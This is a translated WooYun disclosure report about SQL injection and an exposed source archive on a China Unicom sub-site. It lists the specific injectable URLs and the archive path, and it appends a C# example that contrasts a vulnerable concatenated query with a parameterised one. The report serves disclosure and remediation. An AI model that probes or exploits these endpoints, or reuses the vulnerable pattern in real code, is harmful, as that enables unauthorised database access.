
Vulnerability summary

Defect ID: wooyun-2013-044447

Title: China Unicom # Multiple security vulnerabilities on a China Unicom sub-site

Vendor: China Unicom

Author: HackBraid

Submitted: 2013-12-03 11:20

Fixed: 2014-01-17 11:21

Disclosed: 2014-01-17 11:21

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Handed over to a third-party partner organization (CNCERT, the National Computer Network Emergency Response Technical Team) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2013-12-03: Details reported to the vendor; awaiting vendor handling
2013-12-07: Vendor confirmed; details disclosed to the vendor only
2013-12-17: Details disclosed to core white hats and domain experts
2013-12-27: Details disclosed to regular white hats
2014-01-06: Details disclosed to intern white hats
2014-01-17: Details disclosed to the public

Brief description:

As titled; see the detailed description.
The severity of this vulnerability depends on whether the server has been compromised.

Detailed description:

1. http://ln.wap.wo.com.cn, China Unicom "Wo Liaoning"
2. During scanning I found cc.rar; I clicked and downloaded it by accident, and it turned out to be the site's source code!
Link: http://ln.wap.wo.com.cn/ivod/i/cc.rar

[Image: wo.jpg]

3. I think the server has probably been compromised already!
4. Actually I came for SQL injection, so here are two more unfixed SQL injections:
Injection point 1: http://ln.wap.wo.com.cn/ivod/i/home/Play.aspx?vid=XNDI0MjM1NTgw&cid=98
Injection point 2: http://ln.wap.wo.com.cn/ivod/i/home/VideoType.aspx?cid=88&typename=%E6%97%85%E6%B8%B8

Proof of vulnerability:

Only the listing dumped from injection point 1 is posted here (the enumerated MySQL databases and their table names).


Remediation:

The severity speaks for itself; I only offer suggestions for the fix, since your maintenance staff are the professionals!
1. Strictly filter the input characters on the pages that have SQL injection
2. Regular server maintenance

Copyright notice: when reposting, please credit the source: HackBraid@WooYun
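
An added example (not the site's own code, which is not published here) of the first remediation point for an ASP.NET Web Forms handler like Play.aspx backed by MySQL: the injectable string-concatenation pattern beside an input-validated, parameterised version. The MySql.Data connector, the vod_video table and its columns, and the base64-style shape of vid are assumptions.

```csharp
// Added example, not the site's code. Assumes ASP.NET Web Forms with the MySql.Data
// connector; the table, column names and the shape of vid are hypothetical.
using System;
using System.Text.RegularExpressions;
using System.Web.UI;
using MySql.Data.MySqlClient;

public partial class Play : Page
{
    private const string ConnStr = "server=127.0.0.1;database=ivod;uid=app;pwd=<placeholder>";

    // VULNERABLE pattern: query-string values are concatenated into the SQL text, so a
    // crafted vid or cid changes the statement instead of being treated as data.
    private static string BuildUnsafeQuery(string vid, string cid)
    {
        return "SELECT title, url FROM vod_video WHERE vid='" + vid + "' AND cid=" + cid;
    }

    // HARDENED: cid must parse as a non-negative integer and vid must match the expected
    // base64-style alphabet before either reaches the database; both values are then
    // bound as parameters, never spliced into the SQL string.
    public static MySqlCommand BuildSafeCommand(MySqlConnection conn, string vid, string cid)
    {
        if (!int.TryParse(cid, out int cidValue) || cidValue < 0)
            throw new ArgumentException("cid must be a non-negative integer");
        if (vid == null || !Regex.IsMatch(vid, "^[A-Za-z0-9+/=]{1,32}$"))
            throw new ArgumentException("vid has an unexpected format");

        var cmd = new MySqlCommand(
            "SELECT title, url FROM vod_video WHERE vid = @vid AND cid = @cid", conn);
        cmd.Parameters.AddWithValue("@vid", vid);
        cmd.Parameters.AddWithValue("@cid", cidValue);
        return cmd;
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        using (var conn = new MySqlConnection(ConnStr))
        {
            conn.Open();
            using (var cmd = BuildSafeCommand(conn, Request.QueryString["vid"],
                                              Request.QueryString["cid"]))
            using (var reader = cmd.ExecuteReader())
            {
                // Encode output on the way back to the browser as well.
                while (reader.Read())
                    Response.Write(Server.HtmlEncode(reader.GetString(0)));
            }
        }
    }
}
```

Bound parameters close the injection on their own; the format checks additionally narrow what the handler accepts and make malformed requests easy to log.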


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2013-12-07 23:56

Vendor reply:

Latest status:

None yet